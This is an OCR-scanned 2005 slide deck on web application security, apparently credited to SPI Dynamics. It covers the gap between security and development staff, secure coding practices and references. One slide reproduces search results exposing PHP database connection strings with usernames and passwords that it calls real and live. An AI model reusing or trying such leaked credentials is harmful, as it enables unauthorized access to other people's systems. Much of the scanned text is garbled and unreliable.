^isstbaKeas=^e c&av | ,r fa-mote SLUac™! i 
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The Proverbial Post-It On the Monitor 



include ("../connexion bd config.inc") ; function db connect^. 

... global $DBuser ; global SDBpass ; global $DBName ; //Your-MySQL-servers-IP-or-domainname 
SDBhost = "localhost"; //Your user name $DBuser = "poi"; //Your ... 

' s 3k - Cached - Similar pages 



#Edit these variable nam esia 

ItriRhnst = Lm /.IhunT ^TfRiiH^i = "r0kozw8qtx eb"; SDBpass = "J0nL5t29tK 9rCYB 
JDBName = "rOkozwSqtxeb"; Stable^^^TOWETS - ^ 

Cacl - Similar pages 

SDBhost = "localhost"; SDBuser = "getout"; SDBpass = "btyon" „. 

<? $DBhost = "localhost"; $DBuser = "getout"; $DBpass = "bryon"; JDBName = "getout"; ?> 

a 1 k - Cached - Similar pages 







Yes, those are real live database connection strings 

Yes, they contain real live usernames and passwords 



^ ix ™,m- nn, r^ No,. Special Agent, I didn't try them out. 
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Managing Web App Sec 



Security Professionals 
Don't Know The 
Applications 



"As a Network Security 
Professional, I don't know 
how my company's Web 
applications are supposed 
to work so I deploy a 
protective solution... but 
don't know if it's protecting 
what it's supposed to." 



The Web Application 

Security Gap 




Application 
Professionals 
Don't Know 
Security 



"As an Application 
Developer, I can build 
great features and 
functions while 
meeting deadlines, but 
I don't know how to 
build security into my 
Web applications." 



Copyright 2005 SPI Dynamics 



DYNAMICS 



Contributing Factors 



Developers not taught security 

Security not development experts 

Low barrier to entry for building web apps 

Easy to use languages 

Rapid development times 

COPY / PASTE code from websites, books 
etc. 

Lack of internal coding standards / 
guildelines 
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Approach 



Awareness 

Education 

Coding Practices ! 

Standard Libraries 

Assessment Tools and Technology 



Design for Security - document input types, valid formats, constraints 
and build them into the design spec 

Test for Security 

Don't just review code - the implementation counts 

Combine techniques - static, dynamic, bin 

Test in QA , also validate Production 

Test Often - things changes 
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Development builds Application 



Functional defects are found and fixed 



QA performs functional and/or 
performance testing 



App is declared ready for UAT 



Customer performs acceptance testing 



Customer accepts application and 
sets deployment expectation 






Security tests server patches and configuration 




Security applies any missing 
patches or tweaks configuration 



Program goes live 



Deployment begins 
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Development builds Application 



QA performs functional and/or 
performance testing 



iSffliStffli Si 1 1 1 1 1 1 1 1 1 1 1 1 1 



Customer performs acceptance testing 




secu niy d scdjiers 
mil ner|a.pi lit es tnray 
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References / Contact 



XSS-Proxy by Anton Rager 

- http://sourceforqe.net/projects/xss-proxy 

Whitepapers on www.spidynamics.com : 

- Cross-Site-Scripting 

- SQL Injection 

- Blind SQL Injection 

- LDAP Injection 

- SOAP Attacks 




4 rHEE 10OK1ETI • 




Web 

Application 

Security 



ft IUIDE FBI IHILIPEIf 

L rENtfliriON TESTEIS 




M,it1 Fmhff 



Open Web Application Security Project: 
- www.owasp.org Next meeting in Columbia MD: AJAX ! 

Contact: mfisher(g)spidynamics.com 
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